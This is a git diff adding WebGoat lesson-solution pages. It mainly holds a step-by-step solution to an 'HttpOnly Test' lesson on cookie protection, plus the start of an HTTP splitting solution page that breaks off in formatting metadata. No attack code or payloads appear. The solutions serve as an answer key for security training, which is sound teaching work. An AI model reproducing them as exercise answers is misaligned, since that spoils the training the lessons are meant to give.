+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:595.3pt 841.9pt;
+	margin:70.55pt 56.9pt 70.55pt 56.9pt;
+	mso-header-margin:35.3pt;
+	mso-footer-margin:35.3pt;
+	mso-title-page:yes;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal style='text-align:justify'><b style='mso-bidi-font-weight:
+normal'><span style='font-family:"Arial","sans-serif"'>Lesson Plan Title:</span></b><span
+style='font-family:"Arial","sans-serif"'> HttpOnly Test<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><b style='mso-bidi-font-weight:
+normal'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal style='text-align:justify'><b style='mso-bidi-font-weight:
+normal'><span style='font-family:"Arial","sans-serif"'>Concept / Topic To
+Teach: <o:p></o:p></span></b></p>
+
+<!-- Start Instructions -->
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>To
+help mitigate the cross site scripting threat, Microsoft has introduced a new cookie
+attribute entitled 'HttpOnly.' If this flag is set, then the browser should not
+allow client-side script to access the cookie. Since the attribute is
+relatively new, several browsers neglect to handle the new attribute properly. <o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><b style='mso-bidi-font-weight:
+normal'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal style='text-align:justify'><b style='mso-bidi-font-weight:
+normal'><span style='font-family:"Arial","sans-serif"'>General Goal(s): <o:p></o:p></span></b></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>The
+purpose of this lesson is to test whether your browser supports the HTTPOnly
+cookie flag. Note the value of the unique2u cookie. If your browser supports
+HTTPOnly, and you enable it for a cookie, client side code should NOT be able
+to read OR write to that cookie, but the browser can still send its value to
+the server. Some browsers only prevent client side read access, but don't
+prevent write access.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify;page-break-after:avoid'><span
+style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype
+ id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t"
+ path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_115" o:spid="_x0000_i1032" type="#_x0000_t75"
+ style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/HttpOnly_files/image015.jpg" v:shapes="Picture_x0020_115"><![endif]></span></p>
+
+<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
+style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>1</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> Lesson HTTPOnly Test</p>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='text-align:justify'><b style='mso-bidi-font-weight:
+normal'>Solution:<o:p></o:p></b></p>
+
+<p class=MsoNormal style='text-align:justify'><b style='mso-bidi-font-weight:
+normal'><o:p>&nbsp;</o:p></b></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>HTTPOnly
+is not configured. When you click on “Read Cookie” you will get the following
+pop-up in JavaScript, displaying the cookies<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><b style='mso-bidi-font-weight:
+normal'><o:p>&nbsp;</o:p></b></p>
+
+<p class=MsoNormal style='text-align:justify;page-break-after:avoid'><b
+style='mso-bidi-font-weight:normal'><span style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape
+ id="Picture_x0020_117" o:spid="_x0000_i1031" type="#_x0000_t75" style='width:427.5pt;
+ height:94.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=570 height=126
+src="/WebGoat/lesson_solutions/HttpOnly_files/image016.jpg" v:shapes="Picture_x0020_117"><![endif]></span></b></p>
+
+<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
+style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>2</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> All cookies<span
+style='font-weight:normal;mso-bidi-font-weight:bold'><o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>Select
+“Yes” to turn HTTPOnly on. Intercept the HTTP Request and HTTP Response in
+WebScarab.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify;page-break-after:avoid'><span
+style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
+ id="Picture_x0020_118" o:spid="_x0000_i1030" type="#_x0000_t75" style='width:481.5pt;
+ height:344.25pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=459
+src="/WebGoat/lesson_solutions/HttpOnly_files/image017.jpg" v:shapes="Picture_x0020_118"><![endif]></span></p>
+
+<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
+style='mso-element:field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ
+Figure \* ARABIC <span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> HTTP Request</p>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='text-align:justify;page-break-after:avoid'><span
+style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_119"
+ o:spid="_x0000_i1029" type="#_x0000_t75" style='width:481.5pt;height:344.25pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=459
+src="/WebGoat/lesson_solutions/HttpOnly_files/image018.jpg" v:shapes="Picture_x0020_119"><![endif]></span></p>
+
+<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
+style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>4</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> HTTP Response with HTTPOnly
+cookie</p>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>Click
+on “Read cookie”. You will see the JSESSIONID which is not using HTTPOnly.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify;page-break-after:avoid'><span
+style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_120"
+ o:spid="_x0000_i1028" type="#_x0000_t75" style='width:254.25pt;height:94.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image009.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=339 height=126
+src="/WebGoat/lesson_solutions/HttpOnly_files/image019.jpg" v:shapes="Picture_x0020_120"><![endif]></span></p>
+
+<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
+style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>5</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> Only JSESSIONID</p>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='text-align:justify;page-break-after:avoid'><span
+style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_116"
+ o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image011.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/HttpOnly_files/image020.jpg" v:shapes="Picture_x0020_116"><![endif]></span></p>
+
+<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
+style='mso-element:field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ
+Figure \* ARABIC <span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>6</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> HTTPOnly Success</p>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>Click
+on “Write cookie” which again only shows the JSESSIONID cookie.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify;page-break-after:avoid'><span
+style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
+ id="Picture_x0020_121" o:spid="_x0000_i1026" type="#_x0000_t75" style='width:254.25pt;
+ height:94.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image009.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=339 height=126
+src="/WebGoat/lesson_solutions/HttpOnly_files/image019.jpg" v:shapes="Picture_x0020_121"><![endif]></span></p>
+
+<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
+style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>7</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> JSESSIONID cookie</p>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='text-align:justify;page-break-after:avoid'><span
+style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_122"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image013.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/HttpOnly_files/image021.jpg" v:shapes="Picture_x0020_122"><![endif]></span></p>
+
+<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
+style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>8</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> Lesson completed</p>
+
+<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/HttpOnly_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/HttpOnly_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/HttpOnly_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/HttpOnly_files/filelist.xml b/main/project/WebContent/lesson_solutions/HttpOnly_files/filelist.xml
new file mode 100644
index 000000000..b6972bfed
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/HttpOnly_files/filelist.xml
@@ -0,0 +1,20 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../HttpOnly.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image015.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image016.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image017.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image018.jpg"/>
+ <o:File HRef="image009.png"/>
+ <o:File HRef="image019.jpg"/>
+ <o:File HRef="image011.png"/>
+ <o:File HRef="image020.jpg"/>
+ <o:File HRef="image013.png"/>
+ <o:File HRef="image021.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/HttpOnly_files/image001.png b/main/project/WebContent/lesson_solutions/HttpOnly_files/image001.png
new file mode 100644
index 000000000..169190729
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpOnly_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpOnly_files/image003.png b/main/project/WebContent/lesson_solutions/HttpOnly_files/image003.png
new file mode 100644
index 000000000..597cc80eb
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpOnly_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpOnly_files/image005.png b/main/project/WebContent/lesson_solutions/HttpOnly_files/image005.png
new file mode 100644
index 000000000..24e98dab8
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpOnly_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpOnly_files/image007.png b/main/project/WebContent/lesson_solutions/HttpOnly_files/image007.png
new file mode 100644
index 000000000..6b5f8cb64
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpOnly_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpOnly_files/image009.png b/main/project/WebContent/lesson_solutions/HttpOnly_files/image009.png
new file mode 100644
index 000000000..443fc7029
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpOnly_files/image009.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpOnly_files/image011.png b/main/project/WebContent/lesson_solutions/HttpOnly_files/image011.png
new file mode 100644
index 000000000..a378ec244
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpOnly_files/image011.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpOnly_files/image013.png b/main/project/WebContent/lesson_solutions/HttpOnly_files/image013.png
new file mode 100644
index 000000000..98535fdfe
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpOnly_files/image013.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpOnly_files/image015.jpg b/main/project/WebContent/lesson_solutions/HttpOnly_files/image015.jpg
new file mode 100644
index 000000000..efbe77300
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpOnly_files/image015.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpOnly_files/image016.jpg b/main/project/WebContent/lesson_solutions/HttpOnly_files/image016.jpg
new file mode 100644
index 000000000..195c2529b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpOnly_files/image016.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpOnly_files/image017.jpg b/main/project/WebContent/lesson_solutions/HttpOnly_files/image017.jpg
new file mode 100644
index 000000000..91d8d9c6d
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpOnly_files/image017.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpOnly_files/image018.jpg b/main/project/WebContent/lesson_solutions/HttpOnly_files/image018.jpg
new file mode 100644
index 000000000..adc7a901e
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpOnly_files/image018.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpOnly_files/image019.jpg b/main/project/WebContent/lesson_solutions/HttpOnly_files/image019.jpg
new file mode 100644
index 000000000..acfd921d1
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpOnly_files/image019.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpOnly_files/image020.jpg b/main/project/WebContent/lesson_solutions/HttpOnly_files/image020.jpg
new file mode 100644
index 000000000..4c564391a
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpOnly_files/image020.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpOnly_files/image021.jpg b/main/project/WebContent/lesson_solutions/HttpOnly_files/image021.jpg
new file mode 100644
index 000000000..56107235b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpOnly_files/image021.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpOnly_files/themedata.thmx b/main/project/WebContent/lesson_solutions/HttpOnly_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpOnly_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/HttpSplitting.html b/main/project/WebContent/lesson_solutions/HttpSplitting.html
new file mode 100644
index 000000000..4dc8c80b9
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/HttpSplitting.html
@@ -0,0 +1,1015 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/HttpSplitting_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/HttpSplitting_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>1207</o:TotalTime>
+  <o:Created>2007-07-12T15:18:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:18:00Z</o:LastSaved>
+  <o:Pages>5</o:Pages>
+  <o:Words>557</o:Words>
+  <o:Characters>3178</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>26</o:Lines>
+  <o:Paragraphs>7</o:Paragraphs>
+  <o:CharactersWithSpaces>3728</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/HttpSplitting_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/HttpSplitting_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:Zoom>90</w:Zoom>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
